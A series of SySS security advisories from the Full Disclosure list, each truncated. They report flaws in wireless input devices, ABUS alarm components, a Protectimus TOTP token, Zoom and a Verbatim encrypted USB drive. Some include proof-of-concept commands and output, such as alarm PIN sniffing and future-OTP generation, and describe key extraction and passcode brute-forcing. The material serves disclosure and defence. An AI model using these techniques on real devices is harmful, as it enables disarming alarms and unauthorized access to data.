to the USB dongle (receiver) of a target system, containing attacker-controlled keystrokes or keystroke sequences. Proof of Concept (PoC): SySS GmbH could successfully perform keystroke injection attacks against the wireless barcode scanner Inateck BCST-60 using a developed proof-of-concept software tool in combination with the USB radio dongle Crazyradio PA and the nrf-research-firmware by Marc Newlin [2, 3]. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. Disclosure Timeline: 2019-05-22: Vulnerability reported to manufacturer 2019-11-28: Public release of security advisory References: [1] Product website for Inateck BCST-60 barcode scanner https://www.inateck.com/bcst-60-2-4ghz-wireless-barcode-scanner-with-35m-range.html [2] Product website for Crazyradio PA https://www.bitcraze.io/crazyradio-pa/ [3] nRF24 research firmware and tools by Marc Newlin https://github.com/marcnewlin/presentation-clickers [4] SySS Security Advisory SYSS-2019-027 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-027.txt [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en signature.asc Description: OpenPGP digital signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [SYSS-2019-033]: Microsoft Designer Bluetooth Desktop - Insufficient Protection of Code (Firmware) and Data (Cryptographic Key)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2019-033 Product: Designer Bluetooth Desktop Manufacturer: Microsoft Affected Version(s): n/a Tested Version(s): n/a Vulnerability Type: Insufficient Protection of Code (Firmware) and Data (Cryptographic Key) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2019-07-31 Solution Date: - Public Disclosure: 2019-10-10 CVE Reference: Not assigned yet Author of Advisory: Matthias Deeg (SySS GmbH) Overview: Microsoft Designer Bluetooth Desktop is a Bluetooth Low Energy (LE) wireless desktop set consisting of a keyboard and a mouse. The manufacturer describes the product as follows (see [1]): "With its ultra-thin and modern look, the Designer Bluetooth Desktop complements the look of your desk. It wirelessly pairs to your laptop or tablet with the latest Bluetooth Smart technology - instantly connecting without wires or dongles to manage. A full-sized keyboard with built-in number pad and mouse will keep you productive at your desk." Due to the insufficient protection of the flash memory of the keyboard, an attacker with physical access has read and write access to the firmware and the used cryptographic key. Vulnerability Details: SySS GmbH found out that the embedded flash memory of the Microsoft Designer Bluetooth Desktop keyboard can be read and written via the SWD (Serial Wire Debug) interface of the used nRF51822 Bluetooth SoC [2] as the flash memory is not protected by the offered readback protection feature. Thus, an attacker with physical access to the keyboard can simply read and write the nRF51822 flash memory contents and either extract the cryptographic key (Bluetooth LE Long Term Key), for instance, to perform further attacks against the wireless communication, or modify the firmware. However, even if the readback protection of the nRF51822 was enabled, an attacker would be able to read and write the flash memory contents by bypassing the security feature as described in [3] and [4] with slightly more effort. Proof of Concept (PoC): SySS GmbH could successfully read the nRF51822 flash memory contents of the Microsoft Designer Bluetooth Desktop keyboard via the SWD interface using a SEGGER J-Link PRO [5] debug probe in combination with SEGGER J-Link Commander and extract the currently used cryptographic key (Long Term Key). Solution: According to Microsoft, the reported security issue does not meet the bar for servicing via a security update [6]. The described security issue may be fixed in future versions of the product. Disclosure Timeline: 2019-07-31: Vulnerability reported to manufacturer 2019-08-01: Microsoft confirms receipt of security advisory 2019-08-06: Microsoft responds that the reported issue does not meet the bar for servicing via a security update 2019-10-10: Public release of SySS security advisory References: [1] Product website for Microsoft Designer Bluetooth Desktop https://www.microsoft.com/accessories/en-us/products/keyboards/designer-bluetooth-desktop/7n9-1 [2] nRF51822 Product Specification v3.1 https://infocenter.nordicsemi.com/pdf/nRF51822_PS_v3.1.pdf [3] Kris Brosch, Include Security, Firmware dumping technique for an ARM Cortex-M0 SoC, 2015 https://blog.includesecurity.com/2015/11/NordicSemi-ARM-SoC-Firmware-dumping-technique.html [4] Andrew Tierney, Pen Test Partners, NRF51822 code readout protection bypass - a how-to, 2018 https://www.pentestpartners.com/security-blog/nrf51822-code-readout-protection-bypass-a-how-to/ [5] Product website for Segger J-Link PRO https://www.segger.com/products/debug-probes/j-link/models/j-link-pro/ [6] Microsoft Vulnerability Severity Classification for Windows https://aka.ms/windowsbugbar [7] SySS Security Advisory SYSS-2019-033 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-033.txt [8] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without
[FD] [SYSS-2019-034]: Microsoft Surface Keyboard - Insufficient Protection of Code (Firmware) and Data (Cryptographic Key)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2019-034 Product: Surface Keyboard Manufacturer: Microsoft Affected Version(s): WS2-5 Tested Version(s): WS2-5 Vulnerability Type: Insufficient Protection of Code (Firmware) and Data (Cryptographic Key) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2019-07-31 Solution Date: - Public Disclosure: 2019-10-10 CVE Reference: Not assigned yet Author of Advisory: Matthias Deeg (SySS GmbH) Overview: Microsoft Surface Keyboard is a Bluetooth Low Energy (LE) keyboard. The manufacturer describes the product as follows (see [1]): "Meticulously crafted, just like your Surface Enjoy the solid feel of the keyboard under your fingers as you work. And it pairs seamlessly with your Surface with Wireless Bluetooth - at a range of up to 50 feet - and battery power to last a full year." Due to the insufficient protection of the flash memory of the keyboard, an attacker with physical access has read and write access to the firmware and the used cryptographic key. Vulnerability Details: SySS GmbH found out that the embedded flash memory of the Bluetooth LE Microsoft Surface Keyboard can be read and written via the SWD (Serial Wire Debug) interface of the used nRF51822 Bluetooth SoC [2] as the flash memory is not protected by the offered readback protection feature. Thus, an attacker with physical access to the keyboard can simply read and write the nRF51822 flash memory contents and either extract the cryptographic key (Bluetooth LE Long Term Key), for instance, to perform further attacks against the wireless communication, or modify the firmware. However, even if the readback protection of the nRF51822 was enabled, an attacker would be able to read and write the flash memory contents by bypassing the security feature as described in [3] and [4] with slightly more effort. Proof of Concept (PoC): SySS GmbH could successfully read the nRF51822 flash memory contents of the Microsoft Surface Keyboard via the SWD interface using a SEGGER J-Link PRO [5] debug probe in combination with SEGGER J-Link Commander and extract the currently used cryptographic key (Long Term Key). Solution: According to Microsoft, the reported security issue does not meet the bar for servicing via a security update [6]. The described security issue may be fixed in future versions of the product. Disclosure Timeline: 2019-07-31: Vulnerability reported to manufacturer 2019-08-01: Microsoft confirms receipt of security advisory 2019-08-06: Microsoft responds that the reported issue does not meet the bar for servicing via a security update 2019-10-10: Public release of SySS security advisory References: [1] Product website for Microsoft Surface Keyboard https://www.microsoft.com/en-us/p/surface-keyboard/8r3rqvvflp4k [2] nRF51822 Product Specification v3.1 https://infocenter.nordicsemi.com/pdf/nRF51822_PS_v3.1.pdf [3] Kris Brosch, Include Security, Firmware dumping technique for an ARM Cortex-M0 SoC, 2015 https://blog.includesecurity.com/2015/11/NordicSemi-ARM-SoC-Firmware-dumping-technique.html [4] Andrew Tierney, Pen Test Partners, NRF51822 code readout protection bypass - a how-to, 2018 https://www.pentestpartners.com/security-blog/nrf51822-code-readout-protection-bypass-a-how-to/ [5] Product website for Segger J-Link PRO https://www.segger.com/products/debug-probes/j-link/models/j-link-pro/ [6] Microsoft Vulnerability Severity Classification for Windows https://aka.ms/windowsbugbar [7] SySS Security Advisory SYSS-2019-034 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-034.txt [8] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available
[FD] [SYSS-2019-035]: Microsoft Surface Mouse - Insufficient Protection of Code (Firmware) and Data (Cryptographic Key)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2019-035 Product: Surface Mouse Manufacturer: Microsoft Affected Version(s): WS3-2 Tested Version(s): WS3-2 Vulnerability Type: Insufficient Protection of Code (Firmware) and Data (Cryptographic Key) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2019-07-31 Solution Date: - Public Disclosure: 2019-10-10 CVE Reference: Not assigned yet Author of Advisory: Matthias Deeg (SySS GmbH) Overview: Microsoft Surface Mouse is a Bluetooth Low Energy (LE) mouse. The manufacturer describes the product as follows (see [1]): "Sculpted for your hand and designed for an elegantly simple work space, Mouse is the perfect partner to your docked Surface and Keyboard. It was designed to match the sleek aesthetic and exceptional performance of your Surface. The metal scroll wheel feels solid under your finger, and the shape of the body fits perfectly in your hand." Due to the insufficient protection of the flash memory of the mouse, an attacker with physical access has read and write access to the firmware and the used cryptographic key. Vulnerability Details: SySS GmbH found out that the embedded flash memory of the Bluetooth LE Microsoft Surface Mouse can be read and written via the SWD (Serial Wire Debug) interface of the used nRF51822 Bluetooth SoC [2] as the flash memory is not protected by the offered readback protection feature. Thus, an attacker with physical access to the mouse can simply read and write the nRF51822 flash memory contents and either extract the cryptographic key (Bluetooth LE Long Term Key), for instance to perform further attacks against the wireless communication, or modify the firmware. However, even if the readback protection of the nRF51822 was enabled, an attacker would be able to read and write the flash memory contents by bypassing the security feature as described in [3] and [4] with slightly more effort. Proof of Concept (PoC): SySS GmbH could successfully read the nRF51822 flash memory contents of the Microsoft Surface Mouse via the SWD interface using a SEGGER J-Link PRO [5] debug probe in combination with SEGGER J-Link Commander and extract the currently used cryptographic key (Long Term Key). Solution: According to Microsoft, the reported security issue does not meet the bar for servicing via a security update [6]. The described security issue may be fixed in future versions of the product. Disclosure Timeline: 2019-07-31: Vulnerability reported to manufacturer 2019-08-01: Microsoft confirms receipt of security advisory 2019-08-06: Microsoft responds that the reported issue does not meet the bar for servicing via a security update 2019-10-10: Public release of SySS security advisory References: [1] Product website for Microsoft Surface Mouse https://www.microsoft.com/en-us/store/d/surface-mouse/8qbtdr3q4rpw [2] nRF51822 Product Specification v3.1 https://infocenter.nordicsemi.com/pdf/nRF51822_PS_v3.1.pdf [3] Kris Brosch, Include Security, Firmware dumping technique for an ARM Cortex-M0 SoC, 2015 https://blog.includesecurity.com/2015/11/NordicSemi-ARM-SoC-Firmware-dumping-technique.html [4] Andrew Tierney, Pen Test Partners, NRF51822 code readout protection bypass - a how-to, 2018 https://www.pentestpartners.com/security-blog/nrf51822-code-readout-protection-bypass-a-how-to/ [5] Product website for Segger J-Link PRO https://www.segger.com/products/debug-probes/j-link/models/j-link-pro/ [6] Microsoft Vulnerability Severity Classification for Windows https://aka.ms/windowsbugbar [7] SySS Security Advisory SYSS-2019-035 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-035.txt [8] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of th
[FD] [SYSS_2020-014]: ABUS Secvest Wireless Control Device (FUBE50001) - Missing Encryption of Sensitive Data (CWE-311) (CVE-2020-14157)
Advisory ID: SYSS-2020-014 Product: ABUS Secvest Wireless Control Device (FUBE50001) Manufacturer: ABUS Affected Version(s): N/A Tested Version(s): N/A Vulnerability Type: Missing Encryption of Sensitive Data (CWE-311) Risk Level: High Solution Status: Open Manufacturer Notification: 2020-04-03 Solution Date: - Public Disclosure: 2020-06-17 CVE Reference: CVE-2020-14157 Authors of Advisory: Michael Rüttgers, Thomas Detert, Matthias Deeg (SySS GmbH) Overview: ABUS Secvest Wireless Control Device (FUBE50001) is a wireless control panel for the ABUS Secvest wireless alarm system. Some of the device features as described by the manufacturer are (see [1]): " * Easy operation via code or proximity keyfob The Secvest wireless control panel is an optional Secvest accessory. Every wireless control panel can be operated from your system via PIN code. It is possible to arm and disarm the panel via proximity keyfob. * Flexible use in entrance areas Up to 8 control panels can be integrated into the alarm system. These additional modules can be placed in various areas of the building. This provides added convenience for you, because Secvest can be armed and disarmed directly on the wireless control panel, without the need to go back to the central alarm panel every time. In addition to internal arming or arming individual sub-areas, you can also switch a single output, such as the garage door, if desired. * Secure wireless communication Thanks to a secure wireless communication procedure, this product is protected against ‘replay attacks’, as are the Secvest wireless alarm system and Secvest Touch alarm systems. This procedure for preventing third-party tampering exceeds the requirements of the “DIN EN 50131-1 level 2” security standard. " Due to the missing encryption of the wireless communication, an attacker is able to eavesdrop sensitive data as cleartext, for instance, used PINs or proximity token IDs. Vulnerability Details: Michael Rüttgers found out that the wireless communication of the ABUS Secvest Wireless Control Device (FUBE50001) for transmitting sensitive data like PIN codes or IDs of used proximity chip keys (RFID tokens) is not encrypted. This security issue is related to the insecure wireless transmission of sensitive data of the ABUS Secvest remote controls FUBE50014 and FUBE50015 reported back in 2018 (see SySS security advisory SYSS-2018-035 [2]). Thus, an attacker observing radio signals of an ABUS FUBE50001 wireless control panel is able to see all sensitive data of transmitted packets as cleartext and can analyze the used packet format and the communication protocol. For instance, this security issue could successfully be exploited to sniff used PIN codes and used proximity chip key IDs. By knowing the correct PIN code or the ID of a valid ABUS Secvest proximity chip key, an attacker is able to disarm the wireless alarm system in an unauthorized way. Proof of Concept (PoC): Michael Rüttgers, Thomas Detert, and Matthias Deeg developed different PoC software tools, either for the RFCat-based radio dongle YARD Stick One [3] in one version, or the GreatFet One neighbor Erica [4] in another one, that allowed sniffing out used PIN codes or used proximity chip key IDs when eavesdropping on the FUBE50001 wireless communication. The following output exemplarily shows a successful PIN code sniffing attack: $ python2 abus_fube50001_pin_sniffer.py ABUS Secvest FUBE50001 PIN Code Sniffer PoC - SySS GmbH (c) 2020 by Thomas Detert, Michael Rüttgers, and Matthias Deeg --- [*] Listening for ABUS FUBE50001 packets ... [*] Received packet: f0f352b4ccb4ccd52aab52d2acd2d34d4cb34cb32b34d4b530f0f0f352b4ccb4ccd52aab52d2acd2d34d4cb34cb32b34d4b530f0f0f3117162f5 [*] Decoded packet : da0a077ed5c54900626b [*] Received packet: f0f352b4b32b4d352ad5332aab2cb34cd3332cccb4ccacb354acd2ab32aab54d30f0f0f352b4b32b4d352ad5332aab2cb34cd3332cccb4ccacb354ac [*] Decoded packet : da86937707e4884040a0c8ecff005e1fb9 [*] Detected FUBE50001 packet with FUBE50001 PIN [+] Sniffed PIN code: 1337 (...) An example of a successful sniffing attack regarding the ID of an ABUS proximity chip key is illustrated in the following output: $ python2 abus_fube50001_chip_key_id_sniffer.py ABUS Secvest FUBE50001 Proximity Chip Key ID Sniffer PoC - SySS GmbH (c) 2020 by Thomas Detert, Michael Rüttgers, and Matthias Deeg --- [*] Listening for ABUS FUBE50001 packets ... [*] Received packet: f0f352b4b332b2cad52accd554d34cb32cccd2b34ab2cd2b2d4ad32ad2aacaacd32b30f0f0f3057c0764bf788b6ce7d0de43f6c1cb71e7374b7bd7c7a1abe567 [*] Decoded packet: da81937707e488404018b9165b475f3c46 [*] Detected FUBE50001 packet with proximity token ID [
[FD] [SYSS-2020-015]: ABUS Secvest Hybrid module (FUMO50110) - Authentication Bypass Using an Alternate Path or Channel (CWE-288) (CVE-2020-14158)
Advisory ID: SYSS-2020-015 Product: ABUS Secvest Hybrid module (FUMO50110) Manufacturer: ABUS Affected Version(s): N/A Tested Version(s): N/A Vulnerability Type: Authentication Bypass Using an Alternate Path or Channel (CWE-288) Risk Level: High Solution Status: Open Manufacturer Notification: 2020-04-03 Solution Date: - Public Disclosure: 2020-07-30 CVE Reference: CVE-2020-14158 Authors of Advisory: Michael Rüttgers, Thomas Detert, Matthias Deeg (SySS GmbH) Overview: The ABUS Secvest Hybrid module is an expansion module that allows to bridge between the ABUS Secvest alarm panel [1] and further wired systems. Some of the supported features as described by the manufacturer are (see [2]): " * The hybrid module turns wireless into wired and wired into wireless. And alarm systems into combined security systems. By connecting to the ABUS wAppLoxx, the property benefits from intelligent access management while simultaneously eliminating false alarms. * In combination with Secvest, the hybrid module can also be used to implement numerous smart home scenarios. Garage doors, household lighting or rolling shutters can be operated in this way, for example. " Due to missing security features regarding confidentiality and integrity of the used radio communication, different radio-based attacks are possible. Vulnerability Details: The hybrid module does not have any security mechanism that ensures confidentiality or integrity of RF packets that are exchanged between the ABUS Secvest alarm panel and the ABUS Secvest Hybrid module. Thus, an attacker can spoof messages of the ABUS Secvest Hybrid module based on sniffed status RF packets that are issued by the ABUS Secvest Hybrid module on a regularly basis (~2.5 minutes). One of the suggested use cases in [3] (page 27) is the link of a wAppLoxx to the ABUS Secvest alarm panel via the ABUS Secvest Hybrid module. In the intended use case, this allows to disarm the ABUS Secvest panel simultaneously when access by the wAppLoxx system is granted to a properly authenticated user. By spoofing the ABUS Secvest Hybrid module RF messages, an attacker is able to bypass the authentication of wAppLoxx in such a system configuration without the need of any user interaction. For clarity, the authentication of the wAppLoxx cylinder itself is not influenced by this attack, and an attacker still needs to find access to the protected object. The input channels of the ABUS Secvest Hybrid module are simply mapped to a 4-byte field in the RF packages. Modifying those bytes allows an attacker to simulate any change on the ABUS Secvest Hybrid module inputs. Proof of Concept (PoC): Michael Rüttgers and Thomas Detert developed a PoC tool using the RFCat-based radio dongle YARD Stick One [4] that allows spoofing RF packets and thus bypassing the authentication of wAppLoxx in the described system configuration. They provided their tool including documentation and source code to SySS GmbH for responsible disclosure purposes. SySS GmbH could successfully perform the described authentication bypass attack against an ABUS Secvest wireless alarm system used with the ABUS Secvest Hybrid module (FUMO50110). The described spoofing attack is demonstrated in the SySS proof of concept video titled "ABUS Secvest Spoofing Attack" which is available on the SySS YouTube Channel "Pentest TV" [7]. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. Disclosure Timeline: 2020-04-03: Vulnerability reported to manufacturer 2020-07-30: Public release of security advisory References: [1] Product Website for ABUS Secvest Wireless Alarm System https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Alarm-panels-and-kits/Secvest-Wireless-Alarm-System [2] Product Website for ABUS Secvest Hybrid Module https://www.abus.com/uk/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Control-devices-and-extensions/Secvest-Hybrid-module [3] Installation Instructions and User Guide https://www.abus.com/var/ImagesPIM/d110001/medias/docus/22/FUMO50110_BDA_INT_1_3.pdf [4] Product Website YARD Stick One https://greatscottgadgets.com/yardstickone/ [5] SySS Security Advisory SYSS-2020-015 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-015.txt [6] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ [7] SySS Proof of Concept Video: ABUS Sec
[FD] [SYSS-2021-007]: Protectimus SLIM NFC - External Control of System or Configuration Setting (CWE-15) (CVE-2021-32033)
Advisory ID: SYSS-2021-007 Product: Protectimus SLIM NFC Manufacturer: Protectimus Affected Version(s): Hardware Scheme 70 / Software Version 10.01 Tested Version(s): Hardware Scheme 70 / Software Version 10.01 Vulnerability Type: External Control of System or Configuration Setting (CWE-15) "Time Traveler Attack" Risk Level: Medium Solution Status: Open Manufacturer Notification: 2021-02-04 Solution Date: - Public Disclosure: 2021-06-16 CVE Reference: CVE-2021-32033 Author of Advisory: Matthias Deeg (SySS GmbH) Overview: Protectimus SLIM NFC is a reprogrammable time-based one-time password (TOTP) hardware token. The manufacturer describes the product as follows (see [1]): " Protectimus SLIM mini is a new generation of reprogrammable TOTP hardware tokens. They can be used in 2FA systems based on OATH standards, and easily reflashed using an application installed on your NFC-capable Android smartphone. It allows the user to determine the OTP’s expires (30 or 60 seconds), and also set up a secret key. " Due to a design error, the time (internal real-time clock) of the Protectimus SLIM TOTP hardware token can be set independently from the used seed (secret key) for generating one-time passwords without any required authentication. Vulnerability Details: When analyzing the Protectimus SLIM TOTP hardware token, Matthias Deeg found out that the time used by the Protectimus SLIM TOTP hardware token can be set independently from the used seed value for generating time-based one-time passwords without requiring any authentication. Thus, an attacker with short-time physical access to a Protectimus SLIM token can set the internal real-time clock (RTC) to the future, generate one-time passwords, and reset the clock to the current time. This allows for generating valid future time-based one-time passwords without having further access to the hardware token. Proof of Concept (PoC): For demonstrating the time traveler attack exploiting the described security vulnerability, Matthias Deeg developed a Lua script for the Proxmark3 [2]. The following output exemplarily shows a successful attack for generating a valid future one-time password for an attacker-chosen point in time against a vulnerable Protectimus SLIM TOTP hardware token: [usb] pm3 --> script run hf_14a_protectimus_nfc -t 2021-03-14T13:37:00+01:00 [+] executing lua /home/matt/research/proxmark3/client/luascripts/hf_14a_protectimus_nfc.lua [+] args '-t 2021-03-14T13:37:00+01:00' [+] Found token with UID 3F1323540E [+] Set Unix time 1615725420 [!] Please power the token and press [+] The future OTP on 2021-03-14T13:37:00+01:00 (1615725420) is 303831 [+] Set Unix time 1612451460 [+] finished hf_14a_protectimus_nfc A SySS proof of concept video illustrating this security Vulnerability is available on our SySS Pentest TV YouTube channel [5]. The developed Lua script for Proxmark3 is available on our GitHub site [6]. Solution: SySS is not aware of a solution for the described security issue. Disclosure Timeline: 2021-02-04: Vulnerability reported to manufacturer 2021-02-04: Manufacturer acknowledges receipt of security advisory and asks for further information 2021-02-05: SySS provides further information to manufacturer 2021-06-16: Public release of security advisory References: [1] Product website for Protectimus SLIM NFC https://www.protectimus.com/protectimus-slim-mini/ [2] Proxmark3 GitHub repository by the RFID Research Group https://github.com/RfidResearchGroup/proxmark3 [3] SySS Security Advisory SYSS-2021-007 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-007.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [5] SySS Proof of Concept Video: To the Future and Back - Attacking a TOTP Hardware Token https://www.youtube.com/watch?v=C0pM6TIyvXI [6] Protectimus SLIM NFC Lua script for Proxmark3 https://github.com/SySS-Research/protectimus-slim-proxmark3 Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provi
[FD] [SYSS-2020-044]: Zoom - Exposure of Resource to Wrong Sphere (CWE-668) (CVE-2021-28133)
Advisory ID: SYSS-2020-044 Product: Zoom Manufacturer: Zoom Video Communications, Inc. Affected Version(s): 5.4.3 (54779.1115) 5.5.4 (13142.0301) Tested Version(s): 5.4.3 (54779.1115) 5.5.4 (13142.0301) Vulnerability Type: Exposure of Resource to Wrong Sphere (CWE-668) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2020-12-02 Solution Date: - Public Disclosure: 2021-03-18 CVE Reference: CVE-2021-28133 Authors of Advisory: Michael Strametz, Matthias Deeg Overview: Zoom is a video conferencing and messaging software with support for many different devices. Some of the supported features as described by the manufacturer are (see [1]): " * Unparalleled usability Enable quick adoption with meeting capabilities that make it easy to start, join, and collaborate across any device. * Join anywhere, on any device Zoom Meetings syncs with your calendar system and delivers streamlined enterprise-grade video conferencing from desktop and mobile. * Powerful meeting security Robust security settings ensure disruption-free meetings. Encryption, role-based security, Passcode protection, Waiting Rooms and more. " Due to a security issue concerning the "share screen" functionality, screen contents of applications which are not explicitly shared by the screen-sharing user can be seen by other meeting participants. Vulnerability Details: When a Zoom user shares a specific application window via the "share screen" functionality, other meeting participants can briefly see contents of other application windows which were not explicitly shared. The contents of not shared application windows can, for instance, be seen for a short period of time by other users when those windows overlay the shared application window and get into focus. Depending on the unintentionally shared data, this short exposure of screen contents may be a more or less severe security issue. A participant of a Zoom meeting recording a meeting using a screen recorder software may afterwards have access to sensitive data of other users which is accessible in a few frames of the recorded video. Proof of Concept (PoC): SySS could successfully demonstrate the described attack concerning screen recordings of Zoom meetings with unintentionally shared screen contents both using the current Windows and Linux Zoom client software. In this attack scenario, the two users Alice and Mallory are in the same Zoom meeting and Alice shares her web browser window via the "share screen" functionality. Mallory records her whole desktop screen using a screen recorder software, for instance SimpleScreenRecorder [3]. Between showing different things in her shared web browser window, Alice uses another application whose application window happens to overlay the shared web browser window. The contents of this other application window, which is explicitly not shared with Mallory, can sometimes briefly be seen by Mallory. When watching the created screen recording, Mallory can pause the video at will and thus see the unintentionally shared application window contents from Alice. A SySS proof of concept video illustrating this security issue is available on our SySS Pentest TV YouTube channel [5]. Solution: SySS GmbH is not aware of a fix for the described security issue. Please contact the software manufacturer for further information. Disclosure Timeline: 2020-12-02: Vulnerability reported to manufacturer 2020-12-02: Manufacturer acknowledges receipt of security advisory 2020-12-02: Manufacturer asks for more information 2020-12-03: SySS provides more information concerning the security issue 2020-12-03: Manufacturer confirms reproducing the security issue in both the Windows and the Linux client and asks further questions 2020-12-04: SySS answers open questions 2020-12-04: Manufacturer responds and will look into the reported security issue 2021-01-21: SySS asks for status update 2021-02-01: SySS asks for status update 2021-03-18: Public release of security advisory References: [1] Product Website for Zoom https://zoom.us/ [2] SySS Security Advisory SYSS-2020-044 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-044.txt [3] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] GitHub Website of SimpleScreenRecorder https://github.com/MaartenBaert/ssr/ [5] SySS Proof of Concept Video: Zoom U
[FD] [SYSS-2022-001]: Verbatim Keypad Secure USB 3.2 Gen 1 Drive - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28384)
Advisory ID: SYSS-2022-001 Product: Keypad Secure USB 3.2 Gen 1 Drive Manufacturer: Verbatim Affected Version(s): Part Number #49428 Tested Version(s): Part Number #49428 Vulnerability Type:Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) Risk Level:High Solution Status: Open Manufacturer Notification: 2022-01-27 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28384 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Keypad Secure is a USB drive with AES 256-bit hardware encryption and a built-in keypad for passcode entry. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time with a built-in keypad for passcode input. The USB Drive does not store passwords in the computer or system's volatile memory making it far more secure than software encryption. Also, if it falls into the wrong hands, the device will lock and require re-formatting after 20 failed passcode attempts."[1] Due to an insecure design, the Verbatim Keypad Secure USB drive is vulnerable to an offline brute-force attack for finding out the correct passcode, and thus gaining unauthorized access to the stored encrypted data. Vulnerability Details: When analyzing the USB drive Verbatim Keypad Secure, Matthias Deeg found out it uses an insecure design which allows for offline brute-force attacks against the passcode. The Verbatim Keypad Secure consists of the following four main parts: 1. An SSD in M.2 form factor (SSD controller MARVELL-88NV1120) 2. A USB-to-SATA bridge controller (INIC-3637EN) 3. An SPI flash memory chip (XT25F01D) containing the firmware of the INIC-3637EN 4. A keypad controller (unknown chip, marked "SW611 2121") For encrypting the data stored on the SSD, the hardware AES engine of the INIC-3637EN is used. More specifically, AES-256 in ECB (Electronic Codebook) mode is used for data encryption, which is also a security issue by itself described in SySS security advisory SYSS-2022-002[2]. The cryptographic key for the actual data encryption, the so-called data encryption key (DEK), is stored in a special sector of the SSD which in turn is encrypted using AES-256-ECB with a so-called key encryption key (KEK). This KEK is derived from the entered passcode which can be between five and twelve digits long, and can be generated by the keypad controller. When the unlock button is pressed on the Verbatim Keypad Secure, this generated AES 256-bit key is transmitted via SPI communication from the keypad controller to the USB-to-SATA bridge controller INIC-3637EN for configuring the corresponding hardware AES engine. For verifying the entered passcode, the firmware of the INIC-3637EN reads and decrypts the special sector on the SSD with the provided KEK, and checks specific data offsets for the known byte pattern (signature) "0x20 0x49 0x4E 0x49" which represents the string " INI". If this byte pattern could successfully be found, the entered passcode and its derived AES key are very likely correct, and enable the firmware access to the decrypted DEK which can then be used to decrypt the actual SSD user data. This described design of the Verbatim Keypad Secure allows for offline brute-force attacks for finding the correct passcode. Because an attacker can generate and observe the derived AES keys (KEK) of the keypad for all possible passcodes, and then try to correctly decrypt the data of the specific SSD sector. If the magic byte pattern " INI" can be found in the expected places of the resulting plaintext, the correct passcode was found, which then allows for gaining unauthorized access to the encrypted user data. Proof of Concept (PoC): For demonstrating the offline brute-force attack, Matthias Deeg developed a sample brute-forcing software tool which checks the complete search space of all possible passcodes between five and twelve digits. Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-01-27: Vulnerability reported to manufacturer 2022-02-11: 